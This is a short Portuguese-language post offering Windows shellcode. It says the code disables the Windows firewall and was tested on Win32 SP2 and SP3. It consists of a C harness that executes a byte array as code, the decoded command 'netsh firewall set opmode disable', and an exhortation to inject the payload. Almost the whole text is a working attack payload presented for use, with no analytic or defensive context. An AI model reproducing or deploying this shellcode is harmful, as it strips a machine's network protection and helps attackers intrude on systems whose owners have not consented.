Essa shellcode mata o firewall do windows
Testado em: win32 SP2 e 3
#include <stdio.h> char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c" "\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73" "\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x6f\x70\x6d\x6f\x64\x65\x20" "\x64\x69\x73\x61\x62\x6c\x65\x00"; int main(int argc, char **argv) { int (*func)(); func = (int (*)()) code; (int)(*func)(); }
Decoded:
cmd.exe /c netsh firewall set opmode disable
Inject payload! ;*